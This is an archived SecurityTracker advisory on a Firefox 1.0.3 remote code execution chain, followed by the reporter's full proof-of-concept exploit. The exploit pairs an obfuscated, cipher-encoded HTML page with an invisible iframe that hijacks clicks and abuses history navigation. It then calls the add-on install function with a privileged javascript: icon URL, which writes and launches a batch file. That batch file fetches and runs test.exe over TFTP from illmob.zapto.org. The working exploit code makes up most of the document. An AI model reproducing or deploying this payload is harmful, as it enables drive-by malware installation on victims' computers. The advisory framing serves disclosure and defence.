Category:   Application (Web Browser)  >   Mozilla Firefox Vendors:   Mozilla.org
(Additional Exploit Code is Available) Firefox onload() History Access Bug and Install Function Scripting Execution Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013914
SecurityTracker URL:  http://securitytracker.com/id/1013914
CVE Reference:   GENERIC-MAP-NOMATCH (no CVE identifier had been mapped to this issue when the entry was written)   (Links to External Site)
Date:  May 8 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   Two vulnerabilities were reported in Firefox 1.0.3 that, chained together, let a remote user execute arbitrary code on the target user's system: a privileged code-execution flaw in the add-on install function, and a history-access flaw in iframe onload() handling that lets an untrusted page reach that install function.

A remote user can create specially crafted HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.

A remote user can cause a Firefox chrome page to load a 'javascript:' URL with full privileges. The add-on install function exposed on Mozilla's update site accepts an icon URL and does not reject script URLs; the demonstration passes a 'javascript:' URL as the icon, and chrome loads that icon URL as privileged code. In the PoC the script calls netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect') and then uses the XPCOM nsILocalFile and nsIFileOutputStream components to write a batch file (c:\booom.bat) and launch it.

Because the install function is only reachable from pages on the allow-listed Mozilla update hosts ('update.mozilla.org' or 'addon.mozilla.org' per the original report; the demonstration links to 'addons.update.mozilla.org'), the remote user must chain a second flaw to reach it from an untrusted page. The demonstration does this with an iframe whose src is a 'javascript:' URL. The frame names its own window 'stealcookies' and renders an invisible 6x6-pixel link to the Mozilla add-ons site that is moved under the mouse pointer on every mousemove, so the visitor's click lands on that link and navigates the frame to the allow-listed site. The frame's onload() handler, which belongs to the attacking page, can still reach ostensibly restricted members of the now cross-origin frame window, such as its history object: on the second onload it calls history.go(-1), which navigates the frame back to the 'javascript:' URL and executes it in the context of the loaded 'mozilla.org' page. Running there, with window.name already set, the script calls that page's install function with the privileged 'javascript:' icon URL described above.

A demonstration exploit is available at:

http://greyhatsecurity.org/vulntests/ffrc.htm

Paul from Greyhats Security reported this vulnerability. Michael Krax assisted in researching this vulnerability.

Impact:   A remote user can execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry. (Reviewer note, not part of the original entry: the demonstrated chain requires JavaScript running on the attacker's page, a click from the user, and the privileged add-on install path being reachable from the allow-listed Mozilla hosts; until a vendor fix is applied, disabling JavaScript for untrusted sites or disabling software installation from web sites in Firefox's preferences should break the chain.)
Vendor URL:  www.mozilla.org/products/firefox/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 8 2005 Firefox onload() History Access Bug and Install Function Scripting Execution Flaw Lets Remote Users Execute Arbitrary Code



 Source Message Contents

Subject:  firefox 1.0.3 spoof+auto dl




firefox 1.0.3 spoof+auto dl 


./0 bite the cheese illwill./ 
idiot
tftp -i illmob.zapto.org get test.exe c:\test.exe
(This is the first line of the batch file the PoC writes and launches: it fetches test.exe over TFTP from illmob.zapto.org, starts it and then deletes the batch file — see the decoded payload below. The hostname and the dropped path c:\test.exe are the indicators to look for if this sample is encountered.)

./-----------------js.js----------./
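// Injected pop-up-blocker shim (js.js). It wraps window.open so that pop-ups
// not targeting the current window or '_top' receive an inert stub object.
// The original created these as implicit globals (a ReferenceError in strict
// mode); they are declared explicitly here. Top-level bindings of a classic
// script stay visible to the other functions in this file by name.
const blockedReferrer = 'blockedReferrer';
// Captured once at load; not referenced anywhere else in this listing.
const NS_ActualWrite = document.write;
// Set to 1 by postamble() so that it runs at most once.
let RanPostamble = 0;
// The browser's real window.open, handed back by postamble() and used by
// NS_NewOpen/NS_NewOpen2 for pass-through targets.
const NS_ActualOpen = window.open;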
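/**
 * Inert stand-in used both as the constructor of stub pop-up windows
 * (see NS_NewOpen) and as the no-op body of their focus/blur and
 * document.open/write/close members. The original read `this.window` and
 * discarded the result — a dead expression that also throws for a bare
 * strict-mode call — so the body is now an explicit no-op.
 * @returns {undefined}
 */
function NS_NullWindow() {}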
// Stub `document` handed to a blocked pop-up: open/write/close are all
// no-ops so that a page scripting into the pop-up does not throw.
function nullDoc() {
  for (const method of ['open', 'write', 'close']) {
    this[method] = NS_NullWindow;
  }
}
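/**
 * Replacement for window.open installed while the shim is active.
 *
 * A request that targets this very window (same name) or '_top' is passed
 * through to the saved real window.open; anything else is treated as a
 * pop-up and answered with an inert stub whose focus/blur/document members
 * are no-ops, so the calling page does not notice the block.
 *
 * Fixes: the function name was split across two lines in the listing
 * ("function NS_" / "NewOpen(...)"), which is a syntax error and leaves the
 * `window.open=NS_NewOpen` assignment below dangling; `obj` was an implicit
 * global; loose equality replaced by strict.
 *
 * @param {string} url   URL the page asked to open
 * @param {string} nam   target window name
 * @param {string} atr   window feature string
 * @returns {Window|NS_NullWindow} the real window, or a stub for blocked pop-ups
 */
function NS_NewOpen(url, nam, atr) {
  if ((nam !== '' && nam === window.name) || nam === '_top') {
    return NS_ActualOpen(url, nam, atr);
  }
  const stub = new NS_NullWindow();
  stub.focus = NS_NullWindow;
  stub.blur = NS_NullWindow;
  // `this` is the window the page called open() on; a bare call in sloppy
  // mode also sees the window, so fall back to it when `this` is undefined.
  const owner = this || window;
  stub.opener = owner.window;
  stub.document = new nullDoc();
  return stub;
}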
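/**
 * Constructor of the bare stub returned by NS_NewOpen2 for blocked pop-ups.
 * A verbatim duplicate of NS_NullWindow kept under its own name because
 * NS_NewOpen2 references it; the dead `this.window` read is dropped.
 * @returns {undefined}
 */
function NS_NullWindow2() {}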
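/**
 * Second, lighter window.open replacement swapped in by op_stop() while the
 * page's own onload/onunload handlers run. Same-window and '_top' targets go
 * to the real window.open; anything else gets a bare NS_NullWindow2 instance
 * (no focus/blur/document members, unlike the stub built by NS_NewOpen).
 *
 * Fix: strict equality instead of the coercing `==`/`!=`.
 *
 * @param {string} url   URL the page asked to open
 * @param {string} nam   target window name
 * @param {string} atr   window feature string
 * @returns {Window|NS_NullWindow2}
 */
function NS_NewOpen2(url, nam, atr) {
  const passThrough = nam === '_top' || (nam !== '' && nam === window.name);
  return passThrough ? NS_ActualOpen(url, nam, atr) : new NS_NullWindow2();
}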
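// Slot for the window.open that op_stop() displaced; op_start() puts it back.
// Declared explicitly instead of being created as an implicit global.
let NS_ActualOpen2;

/** Swap window.open for the NS_NewOpen2 stub factory, remembering the current one. */
function op_stop() {
  NS_ActualOpen2 = window.open;
  window.open = NS_NewOpen2;
}

/**
 * Restore the window.open saved by op_stop(). Calling it without a prior
 * op_stop() used to overwrite window.open with undefined; now it is a no-op.
 */
function op_start() {
  if (NS_ActualOpen2 === undefined) return;
  window.open = NS_ActualOpen2;
}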
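/**
 * window.onload wrapper installed by the shim: blocks pop-ups (op_stop)
 * around the page's original onload handler, then restores window.open.
 *
 * Fixes: `zl_orig_onload` is only created by postamble(); reading it when it
 * was never set threw a ReferenceError, so it is probed with typeof. And if
 * the original handler throws, window.open used to stay blocked; the restore
 * now runs in `finally`.
 */
function noopen_load() {
  op_stop();
  try {
    if (typeof zl_orig_onload === 'function') zl_orig_onload();
  } finally {
    op_start();
  }
}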
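/**
 * window.onunload wrapper installed by the shim: blocks pop-ups (op_stop)
 * around the page's original onunload handler, then restores window.open.
 *
 * Fixes: `zl_orig_onunload` only exists once postamble() has run, so it is
 * probed with typeof instead of being read unconditionally; op_start() is
 * moved into `finally` so a throwing handler cannot leave window.open blocked.
 */
function noopen_unload() {
  op_stop();
  try {
    if (typeof zl_orig_onunload === 'function') zl_orig_onunload();
  } finally {
    op_start();
  }
}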
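/**
 * Called once from the page's last <script>: records the page's own
 * onload/onunload handlers for the noopen_* wrappers and hands the real
 * window.open back. Guarded by RanPostamble so a second call is a no-op.
 *
 * zl_orig_onload/zl_orig_onunload are read by noopen_load/noopen_unload as
 * globals; the original created them as implicit globals, which fails in
 * strict mode, so they are set as explicit window properties (the same
 * thing in a browser, where window is the global object).
 */
function postamble() {
  if (RanPostamble) return;
  RanPostamble = 1;
  window.zl_orig_onload = window.onload;
  window.zl_orig_onunload = window.onunload;
  window.open = NS_ActualOpen;
}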
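// Activate the shim: route window.open through NS_NewOpen until postamble()
// restores the original. `document.ignore` is an empty bag the original built
// with `new Object()`; nothing in this listing reads it.
window.open = NS_NewOpen;
document.ignore = {};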
-------------------------------
./--------your info .htm-------------./
<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			&lt;script language="javascript" src="yourinfo_files/js.js">&lt;/script&gt;</head>


<body>


&lt;script language="JavaScript"><!--
/**
 * Feeds the page's cipher-text chunks, in order, through d(), which decodes
 * each with codeIt(key, ...) and appends the plain text to the global `ky`.
 * The following <script> then does document.write(ky), which is what makes
 * the payload live; nothing is executed at decode time.
 *
 * Decoded with the mirror cipher defined by codeIt, the chunks are the
 * markup and script shown in plain text further down this listing: a
 * <script> defining getAppVersion(), the "i can tell you your username" bait
 * text, the hidden iframe whose src is a javascript: URL that calls install()
 * with a privileged javascript: icon URL, and the trackMouse/loader scripts.
 * (The first chunk begins '<script language="javascript"><!--' followed by
 * 'function getAppVersion'.)
 *
 * The long string lines below are kept byte-for-byte as archived, including
 * the archive's line wraps.
 *
 * @returns {0} always; the result is left in `ky`
 */
function Decode() {
  // Each d() call carries one chunk of cipher text.
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--\nPAHSBMGH OQBuFFZQDCMGH(){\nUFFHUIQ= HU9MOUBGD.UFFhUIQ;\nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;\nIULGD9QD
 = UFF9QDCMGH.CATCBDMHO(\", #);\nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;\nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB
 q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;\nDQBADH \";\n}\n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH
 BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\\'CBQUJSGGKMQC\\'){8MHRG8.HUIQ=\\'CBQUJSGGKMQC\\';}
  QJCQ{ Q9QHB={BUDOQB:{NDQP:\\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-\".z.v.#-P7+I5+BT.7FM\\'}};MHCBUJJ(Q9QHB,\\'WGA
 UDQ 9AJHQDUTJQ!!!\\',\\'LU9UCSDMFB:Q9UJ(\\\\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(")
;
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\\\\\\\\'S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]\");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\
\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,\"7\"<|\"7\"w|\"7]\",<]\",\");GABFAB=\\\\\\\\\\\\\\'BPBF
 -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\");
d("\\\\\\HRQJ %\"\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\\\\')\\');
 }')+'4/HGCSDMFB34U NDQP=\\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]\"&UFFJMSUBMGH=PMDQPG7\\' CB6JQ=\\'SADCGD:RQPUAJB;\\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0
 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0\"0 IUDOMH8MRBN=0\"0 IUDOMHNQMONB=\"0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:\"F7; 8MRBN:\"F7;
 NQMONB:yF7; 8MRBN:yF7; IUDOMH:\"F7; FURRMHO:\"F7; -IG5-GFUSMB6:\"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03\n\nRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB
 = (Q.FUOQX->)+0F70\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70\n}   \n\n9UD SGAHBQD = \";    \nPAHSBMGH
 JGURQD() {\n    SGAHBQD++\n    MP(SGAHBQD == #) {\n        CBQUJSGGKMQC.PGSAC()\n    } QJCQ MP(SGAHBQD == ]) {\n        CBQUJSGGKMQC.NMCBGD6.OG(-#)\n
         //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;\n    }\n}\n\n4/CSDMFB34/TGR634");
d("/NBIJ3");
  // The return value is unused; the decoded text is left in the global ky.
return 0;}
//-->&lt;/script&gt;
&lt;script language="JavaScript"><!--
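// Decoder for the obfuscated page above. `key` is a 67-character alphabet;
// the cipher maps the character at index i of `key` to the character at the
// mirrored index (length-1-i) and passes through anything not in the
// alphabet. The mapping is its own inverse, so codeIt(key, codeIt(key, s))
// === s: the same routine turns the chunks fed in by Decode() back into the
// markup and script they hide, which is how an analyst can see what the page
// actually writes into the document.
//
// Fixes: `ky` was an implicit global (declared now); codeIt consulted the
// global `key` instead of its own `mC` parameter for the pass-through test;
// the original's hard-coded 33 only mirrored correctly for a 67-character
// alphabet, so the mirror is now computed from the alphabet's length.

/** Accumulated decoded text; written into the document once Decode() finishes. */
let ky = "";

/**
 * Decode one chunk of cipher text and append it to `ky`.
 * @param {string} msg cipher-text chunk
 */
function d(msg) {
  ky = ky + codeIt(key, msg);
}

/** Cipher alphabet; must stay byte-identical to decode the chunks above. */
const key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#\"";

/**
 * Mirror-substitution cipher over the alphabet `mC`.
 * @param {string} mC alphabet; the character at index i maps to index (mC.length - 1 - i)
 * @param {string} eS text to transform
 * @returns {string} transformed text; characters outside `mC` are copied unchanged
 */
function codeIt(mC, eS) {
  const last = mC.length - 1;
  let out = "";
  for (let i = 0; i < eS.length; i++) {
    const ch = eS.charAt(i);
    const idx = mC.indexOf(ch);
    out += idx < 0 ? ch : mC.charAt(last - idx);
  }
  return out;
}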
//-->&lt;/script&gt;&lt;script language="JavaScript"><!--
Decode();document.write(ky);//-->&lt;/script&gt;&lt;script language="javascript"><!--
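/**
 * Legacy browser sniff carried over from the pop-up-blocker template: 1 for
 * Netscape-family browsers reporting major version 3 or later, or Internet
 * Explorer 4 or later, else 0. Nothing else in this listing calls it.
 *
 * Fixes: appname/appversion/majorver were implicit globals; the major
 * version is parsed explicitly instead of relying on string-to-number
 * coercion in `>=`; returns 0 where `navigator` does not exist instead of
 * throwing.
 *
 * @returns {0|1}
 */
function getAppVersion() {
  if (typeof navigator === "undefined") return 0;
  const appname = navigator.appName;
  // First character of appVersion, e.g. "5" of "5.0 (Windows; ...)".
  const majorver = Number(String(navigator.appVersion).charAt(0));
  if (appname === "Netscape" && majorver >= 3) return 1;
  if (appname === "Microsoft Internet Explorer" && majorver >= 4) return 1;
  return 0;
}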
//-->&lt;/script&gt;i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to
 get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}
  else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
 are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile)
;file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance(Compone
nts.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x
 20,420,0);output=\\\\\\\'tftp -i illmob.zapto.org get test.exe c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ncls\\\\\\\\nstart c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ndel
 %0\\\\\\\\ncls\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\'
 style=\'cursor:default;\'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position:
 absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe>&lt;script language="JavaScript"
 type="text/javascript">

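// Keep the hidden 6x6px iframe ("targetframe", declared in the markup above
// with opacity 0) centred under the mouse pointer, so that wherever the
// visitor clicks, the click lands on the frame and on the link it contains.
// This is the click-hijacking half of the PoC.
//
// Fixes: the element was looked up twice per mousemove; a missing element
// (handler firing before the frame exists, or after it was removed) used to
// throw on every mouse move and is now ignored.
document.onmousemove = function trackMouse(e) {
  const frame = document.getElementById("targetframe");
  if (!frame) return;
  frame.style.left = (e.pageX - 3) + "px";
  frame.style.top = (e.pageY - 3) + "px";
};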

// Number of times the hidden iframe has fired onload.
let counter = 0;

// onload handler of the hidden iframe (`<iframe onload="loader()">` in the
// markup above). `stealcookies` is the name the iframe's javascript: URL
// gives its own window, so the identifier resolves to that frame.
// First load: give the frame focus. Second load (after the visitor's click
// navigated the frame to the link it contains): step the frame's history
// back one entry, which reloads the javascript: URL in the frame — the URL
// branches on window.name, which is already set by then. Any later load is
// ignored. The original carried a commented-out line that would have hidden
// the frame at this point.
function loader() {
  counter += 1;
  switch (counter) {
    case 1:
      stealcookies.focus();
      break;
    case 2:
      stealcookies.history.go(-1);
      break;
    default:
      break;
  }
}

&lt;/script&gt;
&lt;script language="javascript">postamble();&lt;/script&gt;
</body></html>
------------------------------------------


 
 

